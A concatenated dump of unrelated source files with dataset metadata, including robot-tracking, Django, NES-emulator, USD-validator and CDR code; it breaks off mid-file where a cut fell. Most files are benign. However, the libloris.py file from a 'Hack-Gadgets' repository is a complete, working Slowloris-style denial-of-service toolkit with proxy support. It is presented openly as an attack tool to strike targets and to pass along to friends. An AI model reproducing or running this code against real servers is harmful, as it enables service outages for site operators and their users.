<filename>home/GroG/workyTracking.py useVirtualArduino = True; xPin = 9; yPin = 6; arduinoPort = "COM5"; cameraIndex = 0; # using Sarxos for usb webcam, the other frame grabbers only worked on my integrated camera frameGrabberType = "org.myrobotlab.opencv.SarxosFrameGrabber"; Runtime.start("gui", "SwingGui"); if useVirtualArduino: virtual = Runtime.start("virtual", "VirtualArduino"); virtual.connect(arduinoPort); t01 = Runtime.start("t01", "Tracking"); x = t01.getX(); # invert if necessary # x.setInverted(True); y = t01.getY(); # invert if necessary # y.setInverted(True); t01.connect(arduinoPort, xPin, yPin, cameraIndex); opencv = t01.getOpenCV(); # noticed some swing display issues - I don't think Sarxos gets updated to display opencv.setFrameGrabberType(frameGrabberType); opencv.broadcastState(); # not sure if necessary - but get things to settle for 3 seconds # before starting tracking sleep(3); # do lk optical point tracking # t01.startLKTracking(); # do face tracking t01.faceDetect();
en
0.60676
# using Sarxos for usb webcam, the other frame grabbers only worked on my integrated camera # invert if necessary # x.setInverted(True); # invert if necessary # y.setInverted(True); # noticed some swing display issues - I don't think Sarxos gets updated to display # not sure if necessary - but get things to settle for 3 seconds # before starting tracking # do lk optical point tracking # t01.startLKTracking(); # do face tracking
1.889813
2
django_pg/models/sql/query.py
OlgaBorisova/django-pgfields
1
6618629
from __future__ import absolute_import, unicode_literals from django.db.models.sql import query from django_pg.utils.gis import gis_backend if gis_backend: from django.contrib.gis.db.models.sql import query as gis_query DJANGO_PG_QUERY_TERMS = { 'len' } class Query(query.Query): query_terms = query.Query.query_terms.union(DJANGO_PG_QUERY_TERMS) if gis_backend: class GeoQuery(gis_query.GeoQuery): query_terms = gis_query.GeoQuery.query_terms.union( DJANGO_PG_QUERY_TERMS, )
from __future__ import absolute_import, unicode_literals from django.db.models.sql import query from django_pg.utils.gis import gis_backend if gis_backend: from django.contrib.gis.db.models.sql import query as gis_query DJANGO_PG_QUERY_TERMS = { 'len' } class Query(query.Query): query_terms = query.Query.query_terms.union(DJANGO_PG_QUERY_TERMS) if gis_backend: class GeoQuery(gis_query.GeoQuery): query_terms = gis_query.GeoQuery.query_terms.union( DJANGO_PG_QUERY_TERMS, )
none
1
1.86463
2
pyloris/libloris.py
Marzooq13579/Hack-Gadgets
8
6618630
<reponame>Marzooq13579/Hack-Gadgets #!/usr/bin/env python """ libloris.py This is the main bulk of the PyLoris toolkit. This file contains: def DefaultOptions - The DefaultOptions function will populate a dict containing all the required options for running a basic PyLoris attack. class Loris - The Loris class is the hammer with which targets are struck. After instantiating this class, one must feed a dict containing connection options through the .LoadOptions member function. After the options are loaded, calling the .start member function will initiate the attack according to options specified. While an attack is underway, one may check the .status for a tuple of (# of total attacks started, # of attack threads, # of current open sockets). From there, you should call .messages.get, errors.get, and debug.get occasionally to gather additional information from PyLoris. See class ScriptLoris for a basic usage of the Loris class. class ScriptLoris - This is a base class for building attack scripts for rapid use or distribution. Simply instantiate a ScriptLoris object, the .options dict properties, and call .mainloop. Once you are satisfied with the results, pass the script along to your friends! """ # Base modules import Queue import socket import thread import threading import time # Some import trickery to get SSL working across Python 2.x versions. 
try: from ssl import wrap_socket except: wrap_socket = socket.ssl # Local modules import socks def DefaultOptions(): return { 'host' : 'localhost', # Host to attack 'port' : 80, # Port to connect to 'ssl' : False, # Use SSL connections 'attacklimit' : 500, # Total number of times to attack (0 for unlimited) 'connectionlimit' : 500, # Total number of concurrent connections (0 for unlimited) 'threadlimit' : 50, # Total number of threads (0 for unlimited) 'connectionspeed' : 1, # Connection speed in bytes/second 'timebetweenthreads' : 1, # Time delay between starting threads 'timebetweenconnections' : 1, # Time delay between starting connections 'quitimmediately' : False, # Close connections immediately after completing request 'socksversion' : '', # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP 'sockshost' : '', # SOCKS host 'socksport' : 0, # SOCKS port 'socksuser' : '', # SOCKS username 'sockspass' : '', # SOCKS password 'request' : '', # The main body of the attack } class Loris(threading.Thread): options = {} running = False attacks = 0 threads = 0 sockets = 0 def __init__(self): threading.Thread.__init__(self) self.connections = Queue.Queue() self.errors = Queue.Queue() self.messages = Queue.Queue() self.debug = Queue.Queue() self.options = DefaultOptions() def LoadOptions(self, o): self.options = o.copy() def run(self): self.messages.put('PyLoris is starting up.') self.running = True thread.start_new_thread(self.build_sockets, ()) for id in range(self.options['threadlimit']): thread.start_new_thread(self.attack, (id,)) self.threads += 1 if self.options['timebetweenthreads'] > 0: time.sleep(self.options['timebetweenthreads']) def build_sockets(self): self.debug.put('Socket Builder started.') count = 0 while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running: if self.options['connectionlimit'] > self.sockets: if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or 
self.options['socksversion'] == 'HTTP': if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4 elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5 else: proxytype = socks.PROXY_TYPE_HTTP s = socks.socksocket() if self.options['socksuser'] == '' and self.options['sockspass'] == '': s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass']) else: s.setproxy(proxytype, self.options['sockshost'], self.options['socksport']) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((self.options['host'], self.options['port'])) if self.options['ssl'] == True: wrap_socket(s) self.connections.put((s, 0)) self.debug.put('Socket opened, connection created.') self.attacks += 1 self.sockets += 1 except Exception, ex: self.errors.put('Could not connect. %s.' % (ex)) if self.options['timebetweenconnections'] > 0: time.sleep(self.options['timebetweenconnections']) self.debug.put('Socket Builder finished.') def attack(self, id): self.debug.put('Attack thread %i started' % (id)) while self.running: (s, index) = self.connections.get() try: if len(self.options['request']) > index: s.send(self.options['request'][index]) index += 1 self.connections.put((s, index)) elif self.options['quitimmediately'] == False: data = s.recv(1024) if not len(data): s.close() self.debug.put('Socket closed, data tranfer finished.') self.sockets -= 1 else: self.connections.put((s, index)) else: s.close() self.debug.put('Socket closed, not waiting for response.') self.sockets -= 1 except Exception, ex: self.errors.put(ex) self.debug.put('Socket closed, an exception occurred.') s.close() self.sockets -= 1 if self.sockets == 0 and self.attacks == self.options['attacklimit']: self.debug.put('Attack limit reached, all sockets closed. 
Shutting down.') self.running = False elif self.sockets > 0 and self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] / self.sockets * self.threads) elif self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] * self.threads) self.debug.put('Attack thread %i finished.' % (id)) self.threads -= 1 def status(self): return (self.attacks, self.threads, self.sockets) def stop(self): self.messages.put('PyLoris is shutting down.') self.running = False while not self.connections.empty(): try: s = self.connections.get(True, 30) s.close() self.sockets -= 1 except: pass class ScriptLoris(Loris): def __init__(self): self.options = DefaultOptions() Loris.__init__(self) def mainloop(self): self.start() time.sleep(1) while self.running: status = self.status() try: while True: message = self.messages.get(False) print('[MESSAGE] %s' %(message)) except: pass try: while True: debug = self.debug.get(False) print('[DEBUG] %s' %(debug)) except: pass try: while True: error = self.errors.get(False) print('[ERROR] %s' %(error)) except: pass print 'Loris has started %i attacks, with %i threads and %i connections currently running.' % status time.sleep(1) status = self.status() print 'Pyloris has completed %i attacks.' % (status[0])
#!/usr/bin/env python """ libloris.py This is the main bulk of the PyLoris toolkit. This file contains: def DefaultOptions - The DefaultOptions function will populate a dict containing all the required options for running a basic PyLoris attack. class Loris - The Loris class is the hammer with which targets are struck. After instantiating this class, one must feed a dict containing connection options through the .LoadOptions member function. After the options are loaded, calling the .start member function will initiate the attack according to options specified. While an attack is underway, one may check the .status for a tuple of (# of total attacks started, # of attack threads, # of current open sockets). From there, you should call .messages.get, errors.get, and debug.get occasionally to gather additional information from PyLoris. See class ScriptLoris for a basic usage of the Loris class. class ScriptLoris - This is a base class for building attack scripts for rapid use or distribution. Simply instantiate a ScriptLoris object, the .options dict properties, and call .mainloop. Once you are satisfied with the results, pass the script along to your friends! """ # Base modules import Queue import socket import thread import threading import time # Some import trickery to get SSL working across Python 2.x versions. 
try: from ssl import wrap_socket except: wrap_socket = socket.ssl # Local modules import socks def DefaultOptions(): return { 'host' : 'localhost', # Host to attack 'port' : 80, # Port to connect to 'ssl' : False, # Use SSL connections 'attacklimit' : 500, # Total number of times to attack (0 for unlimited) 'connectionlimit' : 500, # Total number of concurrent connections (0 for unlimited) 'threadlimit' : 50, # Total number of threads (0 for unlimited) 'connectionspeed' : 1, # Connection speed in bytes/second 'timebetweenthreads' : 1, # Time delay between starting threads 'timebetweenconnections' : 1, # Time delay between starting connections 'quitimmediately' : False, # Close connections immediately after completing request 'socksversion' : '', # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP 'sockshost' : '', # SOCKS host 'socksport' : 0, # SOCKS port 'socksuser' : '', # SOCKS username 'sockspass' : '', # SOCKS password 'request' : '', # The main body of the attack } class Loris(threading.Thread): options = {} running = False attacks = 0 threads = 0 sockets = 0 def __init__(self): threading.Thread.__init__(self) self.connections = Queue.Queue() self.errors = Queue.Queue() self.messages = Queue.Queue() self.debug = Queue.Queue() self.options = DefaultOptions() def LoadOptions(self, o): self.options = o.copy() def run(self): self.messages.put('PyLoris is starting up.') self.running = True thread.start_new_thread(self.build_sockets, ()) for id in range(self.options['threadlimit']): thread.start_new_thread(self.attack, (id,)) self.threads += 1 if self.options['timebetweenthreads'] > 0: time.sleep(self.options['timebetweenthreads']) def build_sockets(self): self.debug.put('Socket Builder started.') count = 0 while (self.options['attacklimit'] == 0 or self.options['attacklimit'] > self.attacks) and self.running: if self.options['connectionlimit'] > self.sockets: if self.options['socksversion'] == 'SOCKS4' or self.options['socksversion'] == 'SOCKS5' or 
self.options['socksversion'] == 'HTTP': if self.options['socksversion'] == 'SOCKS4': proxytype = socks.PROXY_TYPE_SOCKS4 elif self.options['socksversion'] == 'SOCKS5': proxytype = socks.PROXY_TYPE_SOCKS5 else: proxytype = socks.PROXY_TYPE_HTTP s = socks.socksocket() if self.options['socksuser'] == '' and self.options['sockspass'] == '': s.setproxy(proxytype, self.options['sockshost'], self.options['socksport'], self.options['socksuser'], self.options['sockspass']) else: s.setproxy(proxytype, self.options['sockshost'], self.options['socksport']) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((self.options['host'], self.options['port'])) if self.options['ssl'] == True: wrap_socket(s) self.connections.put((s, 0)) self.debug.put('Socket opened, connection created.') self.attacks += 1 self.sockets += 1 except Exception, ex: self.errors.put('Could not connect. %s.' % (ex)) if self.options['timebetweenconnections'] > 0: time.sleep(self.options['timebetweenconnections']) self.debug.put('Socket Builder finished.') def attack(self, id): self.debug.put('Attack thread %i started' % (id)) while self.running: (s, index) = self.connections.get() try: if len(self.options['request']) > index: s.send(self.options['request'][index]) index += 1 self.connections.put((s, index)) elif self.options['quitimmediately'] == False: data = s.recv(1024) if not len(data): s.close() self.debug.put('Socket closed, data tranfer finished.') self.sockets -= 1 else: self.connections.put((s, index)) else: s.close() self.debug.put('Socket closed, not waiting for response.') self.sockets -= 1 except Exception, ex: self.errors.put(ex) self.debug.put('Socket closed, an exception occurred.') s.close() self.sockets -= 1 if self.sockets == 0 and self.attacks == self.options['attacklimit']: self.debug.put('Attack limit reached, all sockets closed. 
Shutting down.') self.running = False elif self.sockets > 0 and self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] / self.sockets * self.threads) elif self.options['connectionspeed'] > 0: time.sleep(1 / self.options['connectionspeed'] * self.threads) self.debug.put('Attack thread %i finished.' % (id)) self.threads -= 1 def status(self): return (self.attacks, self.threads, self.sockets) def stop(self): self.messages.put('PyLoris is shutting down.') self.running = False while not self.connections.empty(): try: s = self.connections.get(True, 30) s.close() self.sockets -= 1 except: pass class ScriptLoris(Loris): def __init__(self): self.options = DefaultOptions() Loris.__init__(self) def mainloop(self): self.start() time.sleep(1) while self.running: status = self.status() try: while True: message = self.messages.get(False) print('[MESSAGE] %s' %(message)) except: pass try: while True: debug = self.debug.get(False) print('[DEBUG] %s' %(debug)) except: pass try: while True: error = self.errors.get(False) print('[ERROR] %s' %(error)) except: pass print 'Loris has started %i attacks, with %i threads and %i connections currently running.' % status time.sleep(1) status = self.status() print 'Pyloris has completed %i attacks.' % (status[0])
en
0.851045
#!/usr/bin/env python libloris.py This is the main bulk of the PyLoris toolkit. This file contains: def DefaultOptions - The DefaultOptions function will populate a dict containing all the required options for running a basic PyLoris attack. class Loris - The Loris class is the hammer with which targets are struck. After instantiating this class, one must feed a dict containing connection options through the .LoadOptions member function. After the options are loaded, calling the .start member function will initiate the attack according to options specified. While an attack is underway, one may check the .status for a tuple of (# of total attacks started, # of attack threads, # of current open sockets). From there, you should call .messages.get, errors.get, and debug.get occasionally to gather additional information from PyLoris. See class ScriptLoris for a basic usage of the Loris class. class ScriptLoris - This is a base class for building attack scripts for rapid use or distribution. Simply instantiate a ScriptLoris object, the .options dict properties, and call .mainloop. Once you are satisfied with the results, pass the script along to your friends! # Base modules # Some import trickery to get SSL working across Python 2.x versions. # Local modules # Host to attack # Port to connect to # Use SSL connections # Total number of times to attack (0 for unlimited) # Total number of concurrent connections (0 for unlimited) # Total number of threads (0 for unlimited) # Connection speed in bytes/second # Time delay between starting threads # Time delay between starting connections # Close connections immediately after completing request # Enable SOCKS proxy, set to SOCKS4, SOCKS5, or HTTP # SOCKS host # SOCKS port # SOCKS username # SOCKS password # The main body of the attack
2.785759
3
libra/transaction/transaction_payload.py
MaslDi/libra-client
0
6618631
from canoser import RustEnum
from libra.transaction.program import Program
from libra.transaction.write_set import WriteSet
from libra.transaction.script import Script
from libra.transaction.module import Module


class TransactionPayload(RustEnum):
    """Canoser serialization type mirroring Libra's TransactionPayload
    Rust enum: each (variant name, payload type) pair below is one
    enum variant."""
    _enums = [
        ('Program', Program),
        ('WriteSet', WriteSet),
        ('Script', Script),
        ('Module', Module)
    ]
from canoser import RustEnum from libra.transaction.program import Program from libra.transaction.write_set import WriteSet from libra.transaction.script import Script from libra.transaction.module import Module class TransactionPayload(RustEnum): _enums = [ ('Program', Program), ('WriteSet', WriteSet), ('Script', Script), ('Module', Module) ]
none
1
1.802787
2
guanabara/Exercicios/mundo 3 _ aulas 16 a 23/085.py
pbittencourt/datasciencestudies
0
6618632
# SETE VALORES, PARES OU ÍMPARES
"""Read 7 integer values from the user, keeping even and odd values in
separate lists, and print each group in ascending order at the end."""

pares = []    # even values, in input order
impares = []  # odd values, in input order

for i in range(1, 8):
    n = int(input(f'Digite o {i}º valor: _ '))
    # Remainder of n / 2 decides the bucket: 0 -> even, 1 -> odd.
    if n % 2 == 0:
        pares.append(n)
    else:
        impares.append(n)

print(f'Os valores pares digitados foram: {sorted(pares)}.')
print(f'Os valores ímpares digitados foram: {sorted(impares)}.')
# SETE VALORES, PARES OU ÍMPARES """O usuário digita 7 valores numéricos e cadastra-os numa lista única, que mantem separados valores pares e ímpares. Ao final, mostra os valores pares e ímpares em ordem crescente.""" numeros = [] # matriz para armazenar todos os valores temp = [] # lista temporária para armazenar a cada iteração for i in range(1, 8): n = int(input(f'Digite o {i}º valor: _ ')) # resto da divisão entre n e 2 # 0: n par # 1: n ímpar r = n % 2 # armazena em "temp" os valores: # [resto, número] temp.append(r) temp.append(n) # copia "temp" para "numeros" numeros.append(temp[:]) # limpa a lista temp p/ a próxima iteração temp.clear() pares = [] # lista p/ armazenar os valores pares impares = [] # lista p/ armazenar os valores ímpares for num in numeros: # se o primeiro índice é igual a 0, o número é par if num[0] == 0: # adiciona o valor à lista dos pares pares.append(num[1]) # se o primeiro índice é igual a 1, o número é ímpar else: # adiciona o valor à lista dos ímpares impares.append(num[1]) print(f'Os valores pares digitados foram: {sorted(pares)}.') print(f'Os valores ímpares digitados foram: {sorted(impares)}.')
pt
0.750341
# SETE VALORES, PARES OU ÍMPARES O usuário digita 7 valores numéricos e cadastra-os numa lista única, que mantem separados valores pares e ímpares. Ao final, mostra os valores pares e ímpares em ordem crescente. # matriz para armazenar todos os valores # lista temporária para armazenar a cada iteração # resto da divisão entre n e 2 # 0: n par # 1: n ímpar # armazena em "temp" os valores: # [resto, número] # copia "temp" para "numeros" # limpa a lista temp p/ a próxima iteração # lista p/ armazenar os valores pares # lista p/ armazenar os valores ímpares # se o primeiro índice é igual a 0, o número é par # adiciona o valor à lista dos pares # se o primeiro índice é igual a 1, o número é ímpar # adiciona o valor à lista dos ímpares
4.246953
4
nes/bus/devices/cartridge/cartridges/nrom.py
Hexadorsimal/pynes
1
6618633
from nes.bus.devices.memory import PrgRom, ChrRom

from ..cartridge import Cartridge


class NromCartridge(Cartridge):
    """iNES mapper 0 (NROM): fixed PRG bank(s) plus an optional CHR bank."""

    def __init__(self, rom_file):
        super().__init__(rom_file)

        # Wrap each raw ROM page in its memory-device type.
        self.prg_rom_pages = [PrgRom(page) for page in rom_file.prg_rom_pages]
        self.chr_rom_pages = [ChrRom(page) for page in rom_file.chr_rom_pages]

        cpu_bus = self.buses['cpu']
        cpu_bus.attach_device('PRG0', self.prg_rom_pages[0],
                              addr=self.PRG0_START, size=self.PRG_SIZE)
        if len(self.prg_rom_pages) == 1:
            # With a single PRG page, the same page is mirrored into the
            # upper PRG window.
            cpu_bus.attach_device('PRG0 Mirror', self.prg_rom_pages[0],
                                  addr=self.PRG1_START, size=self.PRG_SIZE)
        else:
            cpu_bus.attach_device('PRG1', self.prg_rom_pages[1],
                                  addr=self.PRG1_START, size=self.PRG_SIZE)

        if self.chr_rom_pages:
            self.buses['ppu'].attach_device('CHR0', self.chr_rom_pages[0],
                                            addr=self.CHR0_START, size=self.CHR_SIZE)

    def __repr__(self):
        return self.name

    @property
    def name(self):
        return 'NROM Cartridge'
from nes.bus.devices.memory import PrgRom, ChrRom from ..cartridge import Cartridge class NromCartridge(Cartridge): def __init__(self, rom_file): super().__init__(rom_file) self.prg_rom_pages = [] self.chr_rom_pages = [] for prg_rom_page in rom_file.prg_rom_pages: self.prg_rom_pages.append(PrgRom(prg_rom_page)) for chr_rom_page in rom_file.chr_rom_pages: self.chr_rom_pages.append(ChrRom(chr_rom_page)) if len(self.prg_rom_pages) == 1: self.buses['cpu'].attach_device('PRG0', self.prg_rom_pages[0], addr=self.PRG0_START, size=self.PRG_SIZE) self.buses['cpu'].attach_device('PRG0 Mirror', self.prg_rom_pages[0], addr=self.PRG1_START, size=self.PRG_SIZE) else: self.buses['cpu'].attach_device('PRG0', self.prg_rom_pages[0], addr=self.PRG0_START, size=self.PRG_SIZE) self.buses['cpu'].attach_device('PRG1', self.prg_rom_pages[1], addr=self.PRG1_START, size=self.PRG_SIZE) if self.chr_rom_pages: self.buses['ppu'].attach_device('CHR0', self.chr_rom_pages[0], addr=self.CHR0_START, size=self.CHR_SIZE) def __repr__(self): return self.name @property def name(self): return 'NROM Cartridge'
none
1
2.31175
2
tests/web_platform/css_grid_1/grid_model/test_grid_inline_multicol.py
fletchgraham/colosseum
0
6618634
from tests.utils import W3CTestCase


class TestGridInlineMulticol(W3CTestCase):
    # Auto-generate one test method per W3C reference file whose name
    # starts with 'grid-inline-multicol-'.
    vars().update(W3CTestCase.find_tests(__file__, 'grid-inline-multicol-'))
from tests.utils import W3CTestCase class TestGridInlineMulticol(W3CTestCase): vars().update(W3CTestCase.find_tests(__file__, 'grid-inline-multicol-'))
none
1
1.342091
1
src/mobilecontrol.py
ncatlin/lockwatcher
22
6618635
""" mobilecontrol.py @author: <NAME> This is a python script to be run on QPython on Android A remote control program which communicates with the designated computer using authenticated email Upload to your Qpython app using http://qpython.com/create.php """ import androidhelper import hashlib,time import hmac import binascii import email import smtplib secret = 'secret!' #use time+command+secret to generate HMAC def genCode(command): timenow = time.strftime('%d%m%Y%H%M') secretCat = 'secret!'+str(command) ourHash = hmac.new(bytes(secretCat),bytes(timenow),hashlib.sha1) code= ourHash.hexdigest() code = ''.join([code[x].lower() for x in range(1,20,2)]) return code droid = androidhelper.Android() message = "\ \n\ \t 1 -> Lock computer\n\ \t 2 -> Start Motion Monitor\n\ \t 3 -> Stop Motion Monitor\n\ \t 4 -> Standard Shutdown\n\ \t 5 -> Antiforensic Shutdown\n\ Enter Numeric Command" droid.dialogCreateInput("Remote System Control", message, None, "number") droid.dialogSetPositiveButtonText("Send") droid.dialogShow() command = droid.dialogGetResponse().result['value'] #email account login details HOST = 'CHANGEME' USERNAME = 'CHANGEME' PASSWORD = '<PASSWORD>' #myphone@domain - the 'alert sender address' field in lockwatcher FROM_ADDR = 'CHANGEME' #the address of the imap account monitored by lockwatcher TO_ADDR = 'CHANGEME' s = smtplib.SMTP(HOST) s.login(USERNAME, PASSWORD) msg = email.mime.Text.MIMEText('') msg['Subject'] = str(command)+' '+genCode(command) msg['From'] = FROM_ADDR msg['To'] = TO_ADDR s.sendmail(msg['From'],msg['To'], msg.as_string()) droid.makeToast("Command send: check email for reply.")
""" mobilecontrol.py @author: <NAME> This is a python script to be run on QPython on Android A remote control program which communicates with the designated computer using authenticated email Upload to your Qpython app using http://qpython.com/create.php """ import androidhelper import hashlib,time import hmac import binascii import email import smtplib secret = 'secret!' #use time+command+secret to generate HMAC def genCode(command): timenow = time.strftime('%d%m%Y%H%M') secretCat = 'secret!'+str(command) ourHash = hmac.new(bytes(secretCat),bytes(timenow),hashlib.sha1) code= ourHash.hexdigest() code = ''.join([code[x].lower() for x in range(1,20,2)]) return code droid = androidhelper.Android() message = "\ \n\ \t 1 -> Lock computer\n\ \t 2 -> Start Motion Monitor\n\ \t 3 -> Stop Motion Monitor\n\ \t 4 -> Standard Shutdown\n\ \t 5 -> Antiforensic Shutdown\n\ Enter Numeric Command" droid.dialogCreateInput("Remote System Control", message, None, "number") droid.dialogSetPositiveButtonText("Send") droid.dialogShow() command = droid.dialogGetResponse().result['value'] #email account login details HOST = 'CHANGEME' USERNAME = 'CHANGEME' PASSWORD = '<PASSWORD>' #myphone@domain - the 'alert sender address' field in lockwatcher FROM_ADDR = 'CHANGEME' #the address of the imap account monitored by lockwatcher TO_ADDR = 'CHANGEME' s = smtplib.SMTP(HOST) s.login(USERNAME, PASSWORD) msg = email.mime.Text.MIMEText('') msg['Subject'] = str(command)+' '+genCode(command) msg['From'] = FROM_ADDR msg['To'] = TO_ADDR s.sendmail(msg['From'],msg['To'], msg.as_string()) droid.makeToast("Command send: check email for reply.")
en
0.814733
mobilecontrol.py @author: <NAME> This is a python script to be run on QPython on Android A remote control program which communicates with the designated computer using authenticated email Upload to your Qpython app using http://qpython.com/create.php #use time+command+secret to generate HMAC #email account login details #myphone@domain - the 'alert sender address' field in lockwatcher #the address of the imap account monitored by lockwatcher
2.872014
3
plugins/usd/maya/publish/validata_rig_skelRoot_attr.py
davidlatwe/reveries-config
3
6618636
import pyblish.api class ValidateRigSkelRootAttribute(pyblish.api.InstancePlugin): """Check USD "USD_typeName" attribute exists. """ label = "Validate Rig SkelRoot Attribute" order = pyblish.api.ValidatorOrder + 0.132 hosts = ["maya"] families = ["reveries.rig.skeleton"] def process(self, instance): import maya.cmds as cmds skel_root = r'|ROOT|Group' if not cmds.objExists(skel_root): raise Exception(r'"|ROOT|Group" not exists.') # Check 'USD_typeName' attribute exists if not cmds.attributeQuery('USD_typeName', node=skel_root, ex=True): cmds.addAttr(skel_root, longName='USD_typeName', dt='string') cmds.setAttr( '{}.USD_typeName'.format(skel_root), 'SkelRoot', type='string')
import pyblish.api


class ValidateRigSkelRootAttribute(pyblish.api.InstancePlugin):
    """Ensure the rig's "|ROOT|Group" node carries a "USD_typeName" attribute.

    The attribute (value "SkelRoot") is added when missing; an error is
    raised when the group node itself does not exist.
    """

    label = "Validate Rig SkelRoot Attribute"
    order = pyblish.api.ValidatorOrder + 0.132
    hosts = ["maya"]
    families = ["reveries.rig.skeleton"]

    def process(self, instance):
        import maya.cmds as cmds

        skel_root = r'|ROOT|Group'
        if not cmds.objExists(skel_root):
            raise Exception(r'"|ROOT|Group" not exists.')

        # Nothing to do when the attribute is already present.
        if cmds.attributeQuery('USD_typeName', node=skel_root, ex=True):
            return

        # Tag the group so the USD exporter treats it as a SkelRoot prim.
        cmds.addAttr(skel_root, longName='USD_typeName', dt='string')
        cmds.setAttr(
            '{}.USD_typeName'.format(skel_root),
            'SkelRoot', type='string')
en
0.205617
Check USD "USD_typeName" attribute exists. # Check 'USD_typeName' attribute exists
2.23236
2
paragen/modules/encoders/layers/abstract_encoder_layer.py
godweiyang/ParaGen
50
6618637
<reponame>godweiyang/ParaGen import torch.nn as nn class AbstractEncoderLayer(nn.Module): """ AbstractEncoderLayer is an abstract class for encoder layers. """ def __init__(self): super().__init__() self._cache = {} self._mode = 'train' def reset(self, mode): """ Reset encoder layer and switch running mode Args: mode: running mode in [train, valid, infer] """ self._mode = mode self._cache.clear() def _update_cache(self, *args, **kwargs): """ Update internal cache from outside states """ pass def get_cache(self): """ Retrieve inner cache Returns: - cached states as a Dict """ return self._cache def set_cache(self, cache): """ Set cache from outside Args: cache: cache dict from outside """ self._cache = cache
import torch.nn as nn class AbstractEncoderLayer(nn.Module): """ AbstractEncoderLayer is an abstract class for encoder layers. """ def __init__(self): super().__init__() self._cache = {} self._mode = 'train' def reset(self, mode): """ Reset encoder layer and switch running mode Args: mode: running mode in [train, valid, infer] """ self._mode = mode self._cache.clear() def _update_cache(self, *args, **kwargs): """ Update internal cache from outside states """ pass def get_cache(self): """ Retrieve inner cache Returns: - cached states as a Dict """ return self._cache def set_cache(self, cache): """ Set cache from outside Args: cache: cache dict from outside """ self._cache = cache
en
0.774122
AbstractEncoderLayer is an abstract class for encoder layers. Reset encoder layer and switch running mode Args: mode: running mode in [train, valid, infer] Update internal cache from outside states Retrieve inner cache Returns: - cached states as a Dict Set cache from outside Args: cache: cache dict from outside
3.07261
3
app/gbi_server/forms/validator.py
omniscale/gbi-server
2
6618638
<gh_stars>1-10 # This file is part of the GBI project. # Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from wtforms.validators import ValidationError from flask.ext.babel import lazy_gettext as _l from gbi_server.model import User def username_unique(form, field): if User.by_email(field.data): raise ValidationError(_l('email already exists.')) def username_exists(form, field): if not User.by_email(field.data): raise ValidationError(_l('email does not exist.')) def check_password_length(form, field): if len(field.data) < 5: raise ValidationError(_l('Password must at least 6 characters'))
# This file is part of the GBI project. # Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from wtforms.validators import ValidationError from flask.ext.babel import lazy_gettext as _l from gbi_server.model import User def username_unique(form, field): if User.by_email(field.data): raise ValidationError(_l('email already exists.')) def username_exists(form, field): if not User.by_email(field.data): raise ValidationError(_l('email does not exist.')) def check_password_length(form, field): if len(field.data) < 5: raise ValidationError(_l('Password must at least 6 characters'))
en
0.839729
# This file is part of the GBI project. # Copyright (C) 2013 Omniscale GmbH & Co. KG <http://omniscale.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
2.111459
2
dragonphy/cdr.py
StanfordVLSI/dragonphy2
22
6618639
import numpy as np
from dragonphy import Channel, DelayChannel, StaticQuantizer
from dragonphy.channel import calculate_channel_loss
import matplotlib.pyplot as plt


class Cdr:
    """Clock/data-recovery timing-error detector.

    `cdr_type` selects which detector is bound to
    `self.calculate_timing_error` via the `cdr_timing_error` dispatch table.
    """

    def __init__(self, cdr_type='sign_mm'):
        # The table holds plain (unbound) functions, so calling with `self`
        # installs the chosen detector on this instance.
        self.cdr_timing_error[cdr_type](self)

    def cal_mm_timing_error(self, data):
        """Sign-based (Mueller-Muller-style) timing error from samples alone:
        uses the sign of neighbouring samples as the decision."""
        sign_data = np.where(data > 0, 1, -1)
        timing_errors = np.multiply(sign_data[2:] - sign_data[:-2], data[1:-1])
        return timing_errors

    def cal_perfect_mm_timing_error(self, data, bits):
        """Same detector but with the true transmitted bits as decisions."""
        timing_errors = np.multiply(bits[2:] - bits[:-2], data[1:-1])
        return timing_errors

    def set_mm_timing_error(self):
        self.calculate_timing_error = self.cal_mm_timing_error

    def set_pmm_timing_error(self):
        self.calculate_timing_error = self.cal_perfect_mm_timing_error

    # Maps cdr_type -> installer; defined after the functions it references.
    cdr_timing_error = {
        'sign_mm': set_mm_timing_error,
        'perf_mm': set_pmm_timing_error}


if __name__ == "__main__":
    # Demo: run the sign-MM CDR loop against a simulated arctan channel.
    initial_timing = 5.8e-9
    current_timing = 0
    response_depth = 256
    num_iterations = 50000
    adc_bits = 16
    cdr_bits = 16

    cdr = Cdr()
    adc = StaticQuantizer(width=adc_bits, full_scale=1.0)
    chan = DelayChannel(
        channel_type='arctan',
        sampl_rate=1e9,
        resp_depth=response_depth,
        tau=3e-9,
        t_delay=initial_timing
    )

    # Show the analog pulse response next to its quantized version.
